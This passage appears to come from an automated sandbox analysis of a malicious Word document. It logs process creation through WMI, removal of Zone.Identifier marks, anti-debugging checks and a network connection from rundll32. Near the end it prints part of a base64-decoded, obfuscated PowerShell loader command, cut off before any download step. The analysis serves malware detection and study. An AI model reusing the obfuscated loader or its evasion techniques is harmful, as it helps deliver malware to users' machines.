                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004ADA push ecx; ret 7_2_10004AED

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Kviedw\vklxa.red:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Rqvte\amll.nuu:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_006F109C FindFirstFileW,19_2_006F109C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: powershell.exe, 00000005.00000002.2092843138.0000000000374000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,7_2_100011C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_006CC4FF mov eax, dword ptr fs:[00000030h]7_2_006CC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022C4FF mov eax, dword ptr fs:[00000030h]8_2_0022C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_007AC4FF mov eax, dword ptr fs:[00000030h]9_2_007AC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0025C4FF mov eax, dword ptr fs:[00000030h]10_2_0025C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002DC4FF mov eax, dword ptr fs:[00000030h]11_2_002DC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002CC4FF mov eax, dword ptr fs:[00000030h]12_2_002CC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022C4FF mov eax, dword ptr fs:[00000030h]13_2_0022C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0021C4FF mov eax, dword ptr fs:[00000030h]14_2_0021C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0021C4FF mov eax, dword ptr fs:[00000030h]15_2_0021C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_001DC4FF mov eax, dword ptr fs:[00000030h]16_2_001DC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0021C4FF mov eax, dword ptr fs:[00000030h]17_2_0021C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0021C4FF mov eax, dword ptr fs:[00000030h]18_2_0021C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_006FC4FF mov eax, dword ptr fs:[00000030h]19_2_006FC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,7_2_10001B30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_10007F07

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 5.2.136.90 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded seT-ItEM vaRiABLE:09P ([TyPE]("{0}{3}{2}{1}"-F 'Sy','ctOrY','.io.DIrE','steM')) ; seT-itEM ('V'+'Ar'+'iAbLE:av5'+'L'+'oR') ([tYpe]("{0}{7}{1}{3}{4}{6}{5}{2}"-f 'SyS','em.NeT.Serv','er','I','cepo','tManag','In','T') ) ; $ErrorActionPreference = (('S'+'ilen')+('tlyC'+'ont')+'i'+('n'+'ue'));$D81vl6l=$P12R + [char](64) + $O98E;$R_1Z=('K2'+'6E'); (Gci vArIABLe:09p ).VALue::"CREa`Te`DIr`e`CTOry"($HOME + (('B'+('G'+'FLq'+'pw_5iB'+'G')+('FF4w0'+'o')+'sc'+('BG'+'F')) -CRepLAcE('BG'+'F'),[cHar]92));$C69V=('U9'+'4V'); ( VAriablE ("Av5"+"Lo"+"r") -vAluEon )::"s`EcURi`Typ`ROt`Ocol" = (('Tl'+'s')+'12');$N80V=('F8'+'8Y');$Rgb0fqp = (('R9'+'5')+'F');$H23I=('V'+('0'+'4P'));$Gqlw9td=$HOME+(('{0}Lq'+'pw_5i{0}'+'F'+'4w'+'0osc{0}')-f 